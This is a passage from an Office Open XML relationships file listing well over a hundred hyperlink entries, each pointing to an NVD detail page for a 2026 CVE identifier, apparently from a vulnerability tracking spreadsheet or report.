Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53487" TargetMode="External" Id="rId5607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53541" TargetMode="External" Id="rId5608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53584" TargetMode="External" Id="rId5609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53638" TargetMode="External" Id="rId5610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54492" TargetMode="External" Id="rId5611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54614" TargetMode="External" Id="rId5612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55064" TargetMode="External" Id="rId5613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55227" TargetMode="External" Id="rId5614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55468" TargetMode="External" Id="rId5615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55495" TargetMode="External" Id="rId5616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55496" TargetMode="External" Id="rId5617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55499" TargetMode="External" Id="rId5618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55547" TargetMode="External" Id="rId5619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55566" TargetMode="External" Id="rId5620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55696" TargetMode="External" Id="rId5621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55703" TargetMode="External" Id="rId5622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55834" TargetMode="External" Id="rId5623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59717" TargetMode="External" Id="rId5624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61663" TargetMode="External" Id="rId5625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61907" TargetMode="External" Id="rId5626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61911" TargetMode="External" Id="rId5627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62249" TargetMode="External" Id="rId5628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62289" TargetMode="External" Id="rId5629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62377" TargetMode="External" Id="rId5630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62986" TargetMode="External" Id="rId5631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63640" TargetMode="External" Id="rId5632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64664" TargetMode="External" Id="rId5633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66761" TargetMode="External" Id="rId5634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66775" TargetMode="External" Id="rId5635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70427" TargetMode="External" Id="rId5636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70428" TargetMode="External" Id="rId5637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70484" TargetMode="External" Id="rId5638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70488" TargetMode="External" Id="rId5639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70596" TargetMode="External" Id="rId5640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71322" TargetMode="External" Id="rId5641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71486" TargetMode="External" Id="rId5642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72722" TargetMode="External" Id="rId5643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72724" TargetMode="External" Id="rId5644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72732" TargetMode="External" Id="rId5645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72906" TargetMode="External" Id="rId5646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72912" TargetMode="External" Id="rId5647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72919" TargetMode="External" Id="rId5648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId5649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73301" TargetMode="External" Id="rId5650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74248" TargetMode="External" Id="rId5651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75004" TargetMode="External" Id="rId5652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75010" TargetMode="External" Id="rId5653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75018" TargetMode="External" Id="rId5654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75601" TargetMode="External" Id="rId5655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75905" TargetMode="External" Id="rId5656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76962" TargetMode="External" Id="rId5657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76963" TargetMode="External" Id="rId5658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76977" TargetMode="External" Id="rId5659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77352" TargetMode="External" Id="rId5660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId5661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78516" TargetMode="External" Id="rId5662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78593" TargetMode="External" Id="rId5663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78595" TargetMode="External" Id="rId5664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78596" TargetMode="External" Id="rId5665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79515" TargetMode="External" Id="rId5666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79588" TargetMode="External" Id="rId5667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79603" TargetMode="External" Id="rId5668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81423" TargetMode="External" Id="rId5669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81644" TargetMode="External" Id="rId5670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82185" TargetMode="External" Id="rId5671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82298" TargetMode="External" Id="rId5672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82309" TargetMode="External" Id="rId5673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83628" TargetMode="External" Id="rId5674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85132" TargetMode="External" Id="rId5675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85543" TargetMode="External" Id="rId5676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86087" TargetMode="External" Id="rId5677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8615" TargetMode="External" Id="rId5678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86481" TargetMode="External" Id="rId5679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86496" TargetMode="External" Id="rId5680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86499" TargetMode="External" Id="rId5681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86853" TargetMode="External" Id="rId5682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87012" TargetMode="External" Id="rId5683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87013" TargetMode="External" Id="rId5684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87017" TargetMode="External" Id="rId5685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87019" TargetMode="External" Id="rId5686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87032" TargetMode="External" Id="rId5687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87035" TargetMode="External" Id="rId5688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87046" TargetMode="External" Id="rId5689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87449" TargetMode="External" Id="rId5690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87461" TargetMode="External" Id="rId5691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87466" TargetMode="External" Id="rId5692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87495" TargetMode="External" Id="rId5693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87497" TargetMode="External" Id="rId5694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87508" TargetMode="External" Id="rId5695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87516" TargetMode="External" Id="rId5696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87543" TargetMode="External" Id="rId5697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87546" TargetMode="External" Id="rId5698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87548" TargetMode="External" Id="rId5699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87550" TargetMode="External" Id="rId5700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87551" TargetMode="External" Id="rId5701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87556" TargetMode="External" Id="rId5702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87557" TargetMode="External" Id="rId5703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87560" TargetMode="External" Id="rId5704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87561" TargetMode="External" Id="rId5705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87562" TargetMode="External" Id="rId5706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87563" TargetMode="External" Id="rId5707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87564" TargetMode="External" Id="rId5708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87567" TargetMode="External" Id="rId5709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87568" TargetMode="External" Id="rId5710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87573" TargetMode="External" Id="rId5711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87574" TargetMode="External" Id="rId5712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87577" TargetMode="External" Id="rId5713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87586" TargetMode="External" Id="rId5714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87592" TargetMode="External" Id="rId5715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87596" TargetMode="External" Id="rId5716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87598" TargetMode="External" Id="rId5717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87619" TargetMode="External" Id="rId5718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87622" TargetMode="External" Id="rId5719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87630" TargetMode="External" Id="rId5720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87632" TargetMode="External" Id="rId5721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87642" TargetMode="External" Id="rId5722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87651" TargetMode="External" Id="rId5723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87658" TargetMode="External" Id="rId5724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87735" TargetMode="External" Id="rId5725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87736" TargetMode="External" Id="rId5726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87875" TargetMode="External" Id="rId5727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87994" TargetMode="External" Id="rId5728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87997" TargetMode="External" Id="rId5729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9214" TargetMode="External" Id="rId5730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9736" TargetMode="External" Id="rId5731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55086" TargetMode="External" Id="rId5732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61915" TargetMode="External" Id="rId5733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70665" TargetMode="External" Id="rId5734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73657" TargetMode="External" Id="rId5735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87432" TargetMode="External" Id="rId5736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87465" TargetMode="External" Id="rId5737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87472" TargetMode="External" Id="rId5738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87502" TargetMode="External" Id="rId5739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87538" TargetMode="External" Id="rId5740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87559" TargetMode="External" Id="rId5741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87624" TargetMode="External" Id="rId5742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87641" TargetMode="External" Id="rId5743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89092" TargetMode="External" Id="rId5744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0295" TargetMode="External" Id="rId5745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16647" TargetMode="External" Id="rId5746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63466" TargetMode="External" Id="rId5747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70480" TargetMode="External" Id="rId5748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70591" TargetMode="External" Id="rId5749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71555" TargetMode="External" Id="rId5750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82186" TargetMode="External" Id="rId5751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83543" TargetMode="External" Id="rId5752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84113" TargetMode="External" Id="rId5753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8643" TargetMode="External" Id="rId5754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89169" TargetMode="External" Id="rId5755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0309" TargetMode="External" Id="rId5756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12285" TargetMode="External" Id="rId5757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28581" TargetMode="External" Id="rId5758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39113" TargetMode="External" Id="rId5759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49312" TargetMode="External" Id="rId5760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70595" TargetMode="External" Id="rId5761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75421" TargetMode="External" Id="rId5762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79516" TargetMode="External" Id="rId5763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80159" TargetMode="External" Id="rId5764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80213" TargetMode="External" Id="rId5765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87486" TargetMode="External" Id="rId5766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88059" TargetMode="External" Id="rId5767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70598" TargetMode="External" Id="rId5768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70467" TargetMode="External" Id="rId5769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13144" TargetMode="External" Id="rId5770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13146" 